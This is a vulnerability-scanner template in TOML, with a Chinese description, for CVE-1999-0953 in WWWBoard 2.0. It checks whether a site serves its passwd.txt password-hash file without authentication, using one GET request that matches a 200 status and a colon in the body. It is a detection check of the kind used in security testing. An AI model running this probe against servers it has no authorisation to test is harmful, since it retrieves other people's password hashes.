[info]
author = "ave"
description = "WWWBoard 2.0 将用户加密密码存储于 Web 根目录下的 passwd.txt 文件中，远程攻击者无需认证即可直接访问该文件获取所有用户的加密密码哈希。本 PoC 通过请求 passwd.txt 路径验证文件是否可公开读取。"
id = "POC-AVE-1999-1500"
name = "CVE-1999-0953 WWWBoard 2.0 passwd.txt 密码文件泄露 PoC"
severity = "critical"
tags = ["ave-1999-1500"]
vuln_id = [
    "CVE-1999-0953",
    "AVE-1999-1500",
]

[poc]
logic = "all"

[[poc.requests]]
method = "GET"
path = "/{{BaseURL}}/passwd.txt"
protocol = "http"

[poc.requests.headers]
User-Agent = "AVE/1.0"

[[poc.requests.matchers]]
expect = true
part = "body"
type = "word"
words = [":"]

[[poc.requests.matchers]]
expect = true
status = [200]
type = "status"
